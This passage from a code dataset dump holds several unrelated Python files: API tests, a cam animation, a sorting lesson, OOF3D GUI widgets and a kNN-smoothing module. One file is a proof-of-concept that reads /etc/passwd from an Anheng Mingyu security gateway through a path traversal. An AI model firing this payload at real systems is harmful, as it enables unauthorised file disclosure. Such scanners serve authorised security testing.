self.assertAgregate(\n self.events['groups'],\n {\n 'gender': gender\n },\n {\n 'gender': int(not gender)\n }\n )\n\n def test_handler_filter(self):\n\n self.assertAgregate(\n self.events['groups'],\n {\n 'handler_ids': self.events['groups']['handler_id'] + ',' + str(uuid4()),\n\n 'aggregator': 'count',\n 'group_by': '1d'\n },\n {\n 'handler_ids': str(uuid4()) + ',' + str(uuid4()),\n\n 'aggregator': 'count',\n 'group_by': '1d'\n }\n )\n\n def test_age_filter(self):\n age = int(self.events['groups']['extract']['attributes']['age'])\n ages = age, age + 1\n\n self.assertAgregate(\n self.events['groups'],\n {\n 'age__gt': ages[0],\n 'age__lt': ages[1]\n },\n {\n 'age__gt': ages[1]\n }\n )\n\n def test_source_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'sources': self.name + ',' + 'test_Abudabi'\n },\n {\n 'sources': 'test_Abudabi,test_Abudabi'\n }\n )\n\n def test_similarity_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'similarity__gt': 1\n }\n )\n\n def test_sim_descriptor_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'sim_descriptor': self.sim_descriptor\n },\n {\n 'sim_descriptor': str(uuid4())\n }\n )\n\n def test_sim_person_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'sim_person': self.sim_person\n },\n {\n 'sim_person': str(uuid4())\n }\n )\n\n def test_sim_list_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'sim_list': self.events['groups']['search'][0]['list_id']\n },\n {\n 'sim_list': str(uuid4())\n }\n )\n\n def test_sim_user_data(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'sim_user_data': self.name\n },\n {\n 'sim_user_data': 'test_Abudabi'\n }\n )\n\n def test_tag_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'tags': self.name\n },\n {\n 'tags': self.name[:-1]\n }\n )\n\n def test_tags_filter(self):\n self.assertAgregate(\n self.events['groups'],\n {\n 'tags': self.name + '1' + ',' + self.name\n },\n {\n 'tags': self.name[:-1] + ',' + self.name\n }\n )\n\n def test_no_group_by(self):\n reply = fsmRequests.statsGroups({'aggregator': 'count'})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12014, 'detail': \"Required parameter 'group_by' not found\"},\n reply.json)\n\n def test_no_aggregator(self):\n reply = fsmRequests.statsGroups({'group_by': '1h'})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12014, 'detail': \"Required parameter 'aggregator' not found\"},\n reply.json)\n\n def test_no_target(self):\n reply = fsmRequests.statsGroups({'group_by': '1h', 'aggregator': 'min'})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12014, 'detail': \"Required parameter 'target' not found\"},\n reply.json)\n\n def test_wrong_aggregator(self):\n aggregator = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'aggregator': aggregator})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'aggregator'\"},\n reply.json)\n\n def test_wrong_group_by(self):\n group_by = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'group_by': group_by})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'group_by'\"},\n reply.json)\n\n def test_wrong_target(self):\n target = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'target': target})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'target'\"},\n reply.json)\n\n def test_wrong_time_filter(self):\n stop = start = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'create_time__gt': start})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'create_time__gt'\"},\n reply.json)\n reply = fsmRequests.statsGroups({**neededFields, 'create_time__lt': stop})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'create_time__lt'\"},\n reply.json)\n\n def test_wrong_gender_filter(self):\n gender = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'gender': gender})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'gender'\"},\n reply.json)\n\n def test_wrong_handler_filter(self):\n handler_id = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'handler_ids': handler_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'handler_ids'\"},\n reply.json)\n\n def test_wrong_age_filter(self):\n age__lt = age__gt = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'age__gt': age__gt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'age__gt'\"},\n reply.json)\n reply = fsmRequests.statsGroups({**neededFields, 'age__lt': age__lt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'age__lt'\"},\n reply.json)\n\n def test_wrong_similarity__gt_filter(self):\n similarity__gt = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'similarity__gt': similarity__gt})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'similarity__gt'\"},\n reply.json)\n\n def test_wrong_external_id_filter(self):\n external_id = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'external_id': external_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'external_id'\"},\n reply.json)\n\n def test_wrong_sim_descriptor_filter(self):\n sim_descriptor = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'sim_descriptor': sim_descriptor})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'sim_descriptor'\"},\n reply.json)\n\n def test_wrong_sim_person_filter(self):\n sim_person = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'sim_person': sim_person})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'sim_person'\"},\n reply.json)\n\n def test_wrong_person_id_filter(self):\n person_id = 'Abudabi'\n reply = fsmRequests.statsGroups({**neededFields, 'person_id': person_id})\n self.assertEqual(reply.statusCode, 400, reply.statusCode)\n self.assertDictEqual(reply.json, {'error_code': 12012, 'detail': \"Bad query parameter 'person_id'\"},\n reply.json)\n","repo_name":"qonteo/luna","sub_path":"fsm2_linux_rel_v.2.0.0/tests/system_tests/unittests_groups_stat.py","file_name":"unittests_groups_stat.py","file_ext":"py","file_size_in_byte":21863,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"35214188258","text":"while True:\r\n try:\r\n file = input(\"Enter file name: \")\r\n with open(file,\"r\") as rf:\r\n try:\r\n h = float(rf.readline())\r\n R_b = float(rf.readline())\r\n R_f = float(rf.readline())\r\n N = int(rf.readline())\r\n ranges = rf.readline().split(\", \")\r\n mo_types = rf.readline().split(\", \")\r\n except ValueError:\r\n print(\"ValueError\")\r\n break\r\n except FileNotFoundError as e:\r\n print(e)\r\n\r\nfrom turtle import*\r\nimport time\r\nimport turtle\r\nfrom math import*\r\n#creating screen\r\nwn = turtle.Screen()\r\nwn.setup(600,600)\r\nwn.tracer(0)\r\nwn.title(\"Cam Profile Animation\")\r\np = turtle.Turtle()\r\nbc = turtle.Turtle() #follower\r\nbase = turtle.Turtle() #true base circle\r\nflw = turtle.Turtle()\r\nbc.hideturtle()\r\nbase.hideturtle()\r\np.hideturtle()\r\nflw.hideturtle()\r\ncam_list = []\r\nf_points = []\r\n\r\n\r\ntry:\r\n R_o = R_b + R_f\r\nexcept NameError as e:\r\n print(e)\r\ntry:\r\n for mem in ranges: #removing escape character '\\n' and coverting str to int\r\n if mem[-1] == \"\\n\":\r\n ranges[ranges.index(mem)] = int(mem[:-1])\r\n else:\r\n ranges[ranges.index(mem)] = int(mem)\r\nexcept ValueError:\r\n print(\"ValueError\")\r\nexcept NameError as e:\r\n print(e)\r\ntry:\r\n for mo in mo_types:\r\n if mo[-1] == \"\\n\":\r\n mo_types[mo_types.index(mo)] = mo[:-1]\r\nexcept NameError as e:\r\n print(e)\r\n\r\n################################################################\r\nbound = [0] #boundary of inequalities for each angular range\r\ntry:\r\n for i in range(len(ranges)):\r\n sum = 0\r\n for num in ranges[:i+1]:\r\n sum += num\r\n bound.append(sum)\r\nexcept TypeError as e:\r\n print(e)\r\nexcept NameError as e:\r\n print(e)\r\n\r\nb_pairs = [] #boundary pairs of angular range\r\nfor i in range(len(bound)-1):\r\n b_pairs.append([bound[i],bound[i+1]])\r\ndef calc(R,R_p,x_gl): #calculating function that returns coordinates of P\r\n x_p = R_p * cos(x_gl) - sin(x_gl) * R\r\n y_p = R_p * sin(x_gl) + cos(x_gl) * R\r\n mag_N = sqrt((y_p) ** 2 + (x_p) ** 2)\r\n x_n = -(y_p) / mag_N\r\n y_n = (x_p) / mag_N\r\n x_P = R * cos(x_gl) + R_f * x_n\r\n y_P = R * sin(x_gl) + R_f * y_n\r\n return (20*x_P, 20*y_P)\r\n\r\ndef cam_f(mo,x,x_gl,B): #points of cam profile generated\r\n if mo == 'shm rise':\r\n y = (h/2)*(1-cos(pi*x/B))\r\n R = R_o + y\r\n R_p = ((h * pi) / (2 * B)) * sin((pi * x) / B)\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P,y_P)\r\n\r\n elif mo == 'shm return':\r\n y = (h/2)*(1+cos(pi*x/B))\r\n R = R_o + y\r\n R_p = -((h * pi) / (2*B)) * sin(pi * x/B)\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"cycloidal rise\":\r\n y = h*(x/B-(sin(2*pi*x/B)/(2*pi)))\r\n R = R_o + y\r\n R_p = (h/B) * (1 - cos(2*pi * x/B))\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"cycloidal return\":\r\n y = h * (1 - x/B + sin(2 * pi * x/B) / (2 * pi))\r\n R = R_o + y\r\n R_p = (h / B) * (-1 + cos((2 * pi * x) / B))\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"constant acceleration rise\":\r\n if x<=B/2:\r\n y = 2*h*(x/B)**2\r\n R = R_o + y\r\n R_p = 4*h*x/(B**2)\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif x>B/2:\r\n y = h*(1-2*(1-x/B)**2)\r\n R = R_o + y\r\n R_p = 4 * h * (1-x/B)/B\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"constant acceleration return\":\r\n if x<=B/2:\r\n y = h*(1-2*(x/B)**2)\r\n R = R_o + y\r\n R_p = -((h * pi) / (2 * B)) * sin(pi * x/B)\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif x>B/2:\r\n y = 2*h*(1-x/B)**2\r\n R = R_o + y\r\n R_p = -4 * h * (1 - x/B) / B\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"up dwell\":\r\n R = R_o + h\r\n R_p = 0\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n\r\n elif mo == \"down dwell\":\r\n R = R_o\r\n R_p = 0\r\n x_P, y_P = calc(R, R_p, x_gl)\r\n point = turtle.Vec2D(x_P, y_P)\r\n cam_list.append(point)\r\n\r\nM = ['shm rise',\"shm return\",\"cycloidal rise\",\"cycloidal return\",\"constant acceleration rise\",\"constant acceleration return\",\"up dwell\",\"down dwell\"]\r\ntry: #generating cam profile points each degree\r\n for i in range(0,361): #global angle\r\n for bp in b_pairs:\r\n if bp[0]<=i<=bp[1]: #check global angle\r\n if i == 0:\r\n seg_no = b_pairs.index(bp)\r\n if not mo_types[seg_no] in M:\r\n print(\"Error: Type of motion not recognised.\")\r\n break\r\n else:\r\n p.pu()\r\n x_gl = radians(i)\r\n x_lc = x_gl - radians(bp[0]) #finding angle x local to segment\r\n cam_f(mo_types[seg_no], x_lc, x_gl, radians(ranges[seg_no]))\r\n p.pd()\r\n else:\r\n x_gl = radians(i)\r\n x_lc = x_gl - radians(bp[0]) #finding angle x local to segment\r\n seg_no = b_pairs.index(bp)\r\n cam_f(mo_types[seg_no],x_lc,x_gl,radians(ranges[seg_no]))\r\nexcept IndexError as e:\r\n print(e)\r\n\r\ndef disp(mo,x,B): #function to generate coordinates of follower\r\n p.pencolor(\"blue\")\r\n if mo == 'shm rise':\r\n y = (h/2)*(1-cos(pi*x/B))\r\n f_coor = turtle.Vec2D(20*y+20*R_b,0)\r\n f_points.append(f_coor)\r\n elif mo == 'shm return':\r\n y = (h/2)*(1+cos(pi*x/B))\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"cycloidal rise\":\r\n y = h*(x/B-(sin(2*pi*x/B)/(2*pi)))\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"cycloidal return\":\r\n y = h * (1 - x/B + sin(2 * pi * x/B) / (2 * pi))\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"constant acceleration rise\":\r\n if x<=B/2:\r\n y = 2*h*(x/B)**2\r\n elif x>B/2:\r\n y = h*(1-2*(1-x/B)**2)\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"constant acceleration return\":\r\n if x<=B/2:\r\n y = h*(1-2*(x/B)**2)\r\n elif x>B/2:\r\n y = 2*h*(1-x/B)**2\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"up dwell\":\r\n y = h\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n elif mo == \"down dwell\":\r\n y = 0\r\n f_coor = turtle.Vec2D(20 * y+20*R_b, 0)\r\n f_points.append(f_coor)\r\n\r\ntry: #generating follower displacement each angle\r\n for i in range(0,361): #global angle\r\n for bp in b_pairs:\r\n if bp[0]<=i<=bp[1]: #check global angle\r\n x_gl = radians(i)\r\n x_lc = x_gl - radians(bp[0]) #angle local to segment\r\n seg_no = b_pairs.index(bp)\r\n disp(mo_types[seg_no],x_lc,radians(ranges[seg_no]))\r\nexcept IndexError as e:\r\n print(e)\r\n\r\nfor point in cam_list:\r\n if cam_list.index(point) ==0:\r\n p.goto(point)\r\n base.pu()\r\n flw.goto(point)\r\n flw.pd()\r\n flw.setheading(-90)\r\n flw.circle(20*R_f)\r\n base.goto(point)\r\n base.pd()\r\n base.setheading(90)\r\n base.circle(20*R_b)\r\n else:\r\n p.goto(point)\r\n wn.update()\r\n\r\nwhile True:\r\n for i in range(0,360):\r\n newlist = []\r\n for point in cam_list:\r\n newlist.append(point.rotate(-i))\r\n for new_p in newlist:\r\n p.goto(new_p)\r\n flw.clear()\r\n flw.goto(f_points[i])\r\n flw.circle(20*R_f)\r\n wn.update()\r\n time.sleep(0.001)\r\n if i != 359:\r\n p.clear()\r\n else:\r\n pass\r\n p.pu()\r\n p.home()\r\n p.pd()\r\n\r\nturtle.done()","repo_name":"DixonLYK/Cam-Profile-modelling","sub_path":"Cam profile animation 2.py","file_name":"Cam profile animation 2.py","file_ext":"py","file_size_in_byte":8392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"34696774890","text":"import re\n# функции сортировки, регулярные выражения\n\n# my_list = [-2,5,-12,67,12]\n# my_list = [\"qwe\", \"QW\", \"1\", \"!@#\", \"ASDfgh\", \"AZXC\"]\n\n# my_list.sort(reverse=True)\n# new_list = sorted(my_list, key=len)\n\n# print(my_list)\n# print(new_list)\n#########################################################################\ndef sort_by_age(pers_dict):\n age = pers_dict[\"age\"]\n return age\n\n\ndef sort_by_name(pers_dict):\n return pers_dict[\"name\"]\n\n\ndef sort_by_name_len(pers_dict):\n name_len = len(pers_dict[\"name\"])\n return name_len\n\n\ndef sort_by_name_len_and_alphabet(pers_dict):\n name = pers_dict[\"name\"]\n return len(name), name\n\npersons = [\n {\"name\": \"John\", \"age\": 72},\n {\"name\": \"Stephany\", \"age\": 12},\n {\"name\": \"Jack\", \"age\": 42},\n {\"name\": \"Jacob\", \"age\": 37},\n {\"name\": \"Annsy\", \"age\": 29},\n]\n\nnew_persons = sorted(persons, key=lambda x: x[\"name\"])\nprint(new_persons)\nnew_persons = sorted(persons, key=sort_by_name_len)\nprint(new_persons)\n####################################################################\n# def sort_by_bday(pers_dict):\n# age = pers_dict[\"age\"]\n# ages = re.findall(r'[0-9]+', age)\n# if len(ages) > 1:\n# return int(ages[1])\n# else:\n# return 1000000\n#\n# persons = [\n# {\"name\": \"John\", \"age\": \"Годы жизни: 1823 - 1887\"},\n# {\"name\": \"Jack\", \"age\": \" 1878 -- 1905 \"},\n# {\"name\": \"Stephany\", \"age\": \"345 BC - 234\"},\n# ]\n#\n# new_persons = sorted(persons, key=sort_by_bday)\n# print(new_persons)\n","repo_name":"30nt/IntroPython_31_03_21","sub_path":"lesson12.py","file_name":"lesson12.py","file_ext":"py","file_size_in_byte":1532,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"36665879102","text":"import requests\r\nimport urllib, re\r\n\r\ndef verify(url):\r\n relsult = {\r\n 'name': '安恒明御安全网关 任意文件读取(2022HVV)',\r\n 'vulnerable': False,\r\n 'attack': False,\r\n 'url': url,\r\n }\r\n timeout = 3\r\n headers = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) \",\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n }\r\n payload = '/webui/?g=sys_dia_data_down&file_name=../../../../../../../../../../../../etc/passwd'\r\n vurl = urllib.parse.urljoin(url, payload)\r\n try:\r\n finger_rep = requests.get(url, headers=headers, timeout=timeout, verify=False)\r\n if len(finger_rep.headers['P3P']) > 0:\r\n rep = requests.get(vurl, headers=headers, timeout=timeout, verify=False)\r\n if re.search('root:.*:0:0', rep.text) and rep.status_code == 200:\r\n relsult['vulnerable'] = True\r\n relsult['verify'] = vurl\r\n return relsult\r\n except:\r\n return relsult\r\n","repo_name":"tr0uble-mAker/POC-bomber","sub_path":"pocs/redteam/mingyu_fileread_2022.py","file_name":"mingyu_fileread_2022.py","file_ext":"py","file_size_in_byte":1040,"program_lang":"python","lang":"en","doc_type":"code","stars":1879,"dataset":"github-code","pt":"37"} +{"seq_id":"2139890503","text":"from ooflib.SWIG.common import switchboard\nfrom ooflib.common import debug\nfrom ooflib.common.IO.GUI import chooser\nfrom ooflib.common.IO.GUI import parameterwidgets\nfrom ooflib.engine import namedanalysis\n\nclass AllAnalyses(object):\n def getNames(self):\n return (namedanalysis.analysisNames())\n def signals(self):\n return [\n switchboard.requestCallbackMain(\"named analyses changed\",\n self.update)\n ]\n\nclass AnalysisNamesWidgetBase(parameterwidgets.ParameterWidget):\n def __init__(self, param, scope=None, name=None, verbose=False):\n names = self.getNames()\n names.sort()\n self.widget = chooser.ScrolledMultiListWidget(names,\n callback=self.widgetCB)\n parameterwidgets.ParameterWidget.__init__(self, self.widget.gtk,\n scope, name=name,\n expandable=True,\n verbose=verbose)\n self.widget.set_selection(param.value)\n self.widgetChanged(param.value is not None, interactive=False)\n self.sbcallbacks = self.signals()\n self.widgetChanged(len(self.get_value()) > 0, interactive=False)\n def cleanUp(self):\n map(switchboard.removeCallback, self.sbcallbacks)\n parameterwidgets.ParameterWidget.cleanUp(self)\n def get_value(self):\n return self.widget.get_value()\n def set_value(self, value):\n self.widget.set_selection(value)\n def widgetCB(self, list, interactive):\n self.widgetChanged(len(list) > 0, interactive=True)\n def update(self, *args):\n names = self.getNames()\n names.sort()\n self.widget.update(names)\n self.widgetChanged(len(self.get_value()) > 0, interactive=False)\n\n\nclass AnalysisNamesWidget(AnalysisNamesWidgetBase, AllAnalyses):\n pass\n\ndef _AnalysisNamesParam_makeWidget(self, scope=None, verbose=False):\n return AnalysisNamesWidget(self, scope, name=self.name, verbose=verbose)\n\nnamedanalysis.AnalysisNamesParameter.makeWidget = _AnalysisNamesParam_makeWidget\n\n################\n\nclass AnalysisNameWidgetBase(parameterwidgets.ParameterWidget):\n def __init__(self, param, scope=None, name=None, verbose=False):\n self.chooser = chooser.ChooserWidget([], name=name)\n parameterwidgets.ParameterWidget.__init__(self, self.chooser.gtk, scope, verbose=verbose)\n self.update()\n if param.value is not None:\n self.set_value(param.value)\n self.sbcallbacks = [\n switchboard.requestCallbackMain(\"named analyses changed\",\n self.update)\n ]\n def cleanUp(self):\n map(switchboard.removeCallback, self.sbcallbacks)\n parameterwidgets.ParameterWidget.cleanUp(self)\n def set_value(self, name):\n self.chooser.set_state(name)\n self.widgetChanged(name is not None, interactive=False)\n def get_value(self):\n return self.chooser.get_value()\n def update(self, *args):\n names = self.getNames()\n names.sort()\n self.chooser.update(names)\n self.widgetChanged(len(names) > 0, interactive=False)\n\n\nclass AnalysisNameWidget(AnalysisNameWidgetBase, AllAnalyses):\n pass\n\ndef _AnalysisNameParam_makeWidget(self, scope=None, verbose=False):\n return AnalysisNameWidget(self, scope, name=self.name, verbose=verbose)\n\nnamedanalysis.AnalysisNameParameter.makeWidget = _AnalysisNameParam_makeWidget\n","repo_name":"usnistgov/OOF3D","sub_path":"SRC/engine/IO/GUI/namedanalysiswidgets.py","file_name":"namedanalysiswidgets.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":31,"dataset":"github-code","pt":"37"} +{"seq_id":"8763953728","text":"import time\nfrom math import log, ceil\n\nimport numpy as np\nfrom scipy.sparse import csr_matrix\nimport scanpy as sc\nfrom sklearn.metrics.pairwise import pairwise_distances\nfrom sklearn.decomposition import PCA\n\n\ndef _median_normalize(X):\n \"\"\"Performs median-normalization.\n \n Parameters\n ----------\n X : numpy.ndarray\n A p-by-n expression matrix containing UMI counts for p genes and n\n cells.\n \n Returns\n -------\n numpy.ndarray\n A p-by-n expression matrix containing the normalized UMI counts.\n \n Notes\n -----\n We first determine the median total UMI count per cell, and then scale\n each expression profile so that its total UMI count equals that number.\n This normalization method was originally described as \"Model I\" in\n Grün et al., Nature Methods 2014).\n \"\"\"\n num_transcripts = np.sum(X, axis=1)\n X_norm = (np.median(num_transcripts) / num_transcripts).reshape(-1,1) * X\n return X_norm\n\n\ndef _freeman_tukey_transform(X):\n \"\"\"Applies the Freeman-Tukey transformation, y = sqrt(x) + sqrt(x+1).\n \n Parameters\n ----------\n X : numpy.ndarray\n A n-by-p expression matrix containing UMI counts for n cells \n and p genes (usually after median-normalization).\n \n Returns\n -------\n numpy.ndarray\n A n-by-p expression matrix containing the Freeman-Tukey-transformed\n UMI counts.\n \n Notes\n -----\n The Freeman-Tukey transformation serves to stabilize the variance of\n Poisson-distributed random variables. For X ~ Pois(l) with l >= 1, Freeman\n and Tukey (1953) show that Var(X) = 1 (+- 6%).\n \"\"\"\n return np.sqrt(X) + np.sqrt(X+1)\n\n\ndef _calculate_pc_scores(matrix, d, seed=0, verbose=False):\n \"\"\"Projects the cells onto their first d principal components.\n \n Parameters\n -----\n X: `numpy.ndarray`\n A n-by-p expression matrix containing the UMI counts for n cells\n and p genes.\n \n Returns\n -------\n `numpy.ndarray`\n A n-by-d matrix containing the coordinates of n cells in d-dimensional\n principal component space.\n\n Notes\n -----\n We perform median-normalization and Freeman-Tukey-transformation to the UMI\n counts, before performing PCA. Median-normalization serves to counteract\n efficiency noise (Grün et al., 2014), whereas Freeman-Tukey transformation\n stabilizes the technical variance of the data. While PCA does not require\n homoskedastic data, variance-stabilization ensures that the increased\n technical variance of highly expressed genes does not result in the first\n PCs being biased towards highly expressed genes.\n We specify svd_solver='randomized', which invokes the randomized algorithm\n by Halko et al. (2009) to efficiently calculate the first d principal\n components. (We assume that d << min(p, n-1).)\n \"\"\"\n # median-normalize\n tmatrix = _median_normalize(matrix)\n # Freeman-Tukey transform\n tmatrix = _freeman_tukey_transform(tmatrix)\n pca = PCA(n_components=d, svd_solver='arpack', random_state=seed)\n t0 = time.time()\n tmatrix = pca.fit_transform(tmatrix)\n t1 = time.time()\n var_explained = np.cumsum(pca.explained_variance_ratio_)[-1]\n if verbose:\n print('\\tPCA took %.1f s.' % (t1-t0))\n print('\\tThe fraction of variance explained by the top %d PCs is %.1f %%.'\n % (d, 100*var_explained))\n\n return tmatrix\n\n\ndef _calculate_pairwise_distances(X, num_jobs=1):\n \"\"\"Calculates the distances between all cells in X.\n \n Parameters\n -----\n X: numpy.ndarray\n A n-by-d matrix containing the coordinates of n cells in d-dimensional\n space.\n \n Returns\n -------\n numpy.ndarray\n A n-by-n matrix containing the pairwise distances between all cells.\n \n Notes\n -----\n This uses the Euclidean metric.\n \"\"\"\n D = pairwise_distances(X, n_jobs=num_jobs, metric='euclidean')\n return D\n\n\ndef knn_smoothing(X, k, d=10, dither=0.03, seed=0, verbose=False):\n \"\"\"K-nearest neighbor smoothing for UMI-filtered single-cell RNA-Seq data.\n \n This function implements an improved version of the kNN-smoothing 2\n algorithm by Wagner et al.\n (https://www.biorxiv.org/content/early/2018/04/09/217737).\n \n Parameters\n ----------\n X : numpy.ndarray\n A n-by-p expression matrix containing UMI counts for p genes and n\n cells. Must contain floating point values, i.e. dtype=np.float64.\n k : int\n The number of neighbors to use for smoothing.\n d : int, optional\n The number of principal components to use for identifying neighbors.\n Default: 10.\n dither : float, optional\n Amount of dither to apply to the partially smoothed and PCA-transformed\n data in each step. Specified as the fraction of the range of the\n cell scores for each PC. Default: 0.03.\n seed : int, optional\n The seed for initializing the pseudo-random number generator used by\n the randomized PCA algorithm. This usually does not need to be changed.\n Default: 0.\n verbose : bool, optional\n If True, print progress information. Default: False.\n \n Returns\n -------\n numpy.ndarray\n A n-by-p expression matrix containing the smoothed expression values.\n The matrix is not normalized. Therefore, even though efficiency noise\n is usually dampened by the smoothing, median-normalization of the\n smoothed matrix is recommended.\n \n Raises\n ------\n ValueError\n If X does not contain floating point values.\n If k is invalid (k < 1, or k >= n).\n If d is invalid (d < 1 or d > # principal components).\n \"\"\"\n np.random.seed(seed)\n\n if not (X.dtype == np.float64 or X.dtype == np.float32):\n raise ValueError('X must contain floating point values! Try X = np.float64(X).')\n\n n, p = X.shape\n num_pcs = min(p, n-1) # the number of principal components\n\n if k < 1 or k > n:\n raise ValueError('k must be between 1 and and %d.' % n)\n if d < 1 or d > num_pcs:\n raise ValueError('d must be between 1 and %d.' % num_pcs)\n\n if verbose:\n print('Performing kNN-smoothing v2.1 with k=%d, d=%d, and dither=%.3f...' % (k, d, dither))\n\n t0_total = time.time()\n\n if k == 1:\n num_steps = 0\n else:\n num_steps = ceil(log(k)/log(2))\n \n S = X.copy()\n \n for t in range(1, num_steps+1):\n k_step = min(pow(2, t), k)\n if verbose:\n print('Step %d/%d: Smooth using k=%d' % (t, num_steps, k_step))\n \n Y = _calculate_pc_scores(S, d, seed=seed, verbose=verbose)\n if dither > 0:\n for l in range(d):\n ptp = np.ptp(Y[:, l])\n dy = (np.random.rand(Y.shape[0])-0.5)*ptp*dither\n Y[:, l] = Y[:, l] + dy\n\n # determine cell-cell distances using smoothed matrix\n t0 = time.time()\n D = _calculate_pairwise_distances(Y)\n t1 = time.time()\n if verbose:\n print('\\tCalculating pair-wise distance matrix took %.1f s.' % (t1-t0))\n \n t0 = time.time()\n A = np.argsort(D, axis=1, kind='mergesort')\n t1 = time.time()\n if verbose:\n print('\\tRunning argsort took %.1f s.' % (t1-t0))\n \n t0 = time.time()\n for j in range(X.shape[0]):\n ind = A[j, :k_step]\n S[j, :] = np.sum(X[ind, :], axis=0)\n t1 = time.time()\n if verbose:\n print('\\tCalculating the smoothed expression matrix took %.1f s.' % (t1-t0))\n\n t1_total = time.time()\n if verbose:\n print('kNN-smoothing finished in %.1f s.' % (t1_total-t0_total))\n\n return S\n\n\ndef knn_smooth_adata(\n adata,\n groupby=['donor'],\n k=16,\n n_components=20,\n dither=0.03,\n random_state=42,\n):\n \"\"\"Wrapper for NN-smoothing for use with AnnData objects.\n \n Parameters\n ----------\n adata : AnnData\n An AnnData object containing the expression matrix in adata.X.\n groupby : str or list of str, optional\n The key(s) of the observations grouping to consider. Default: ['donor'].\n k : int, optional\n The number of neighbors to use for smoothing. Default: 16.\n n_components : int, optional\n The number of principal components to use for identifying neighbors.\n Default: 20.\n dither : float, optional\n Amount of dither to apply to the partially smoothed and PCA-transformed\n data in each step. Specified 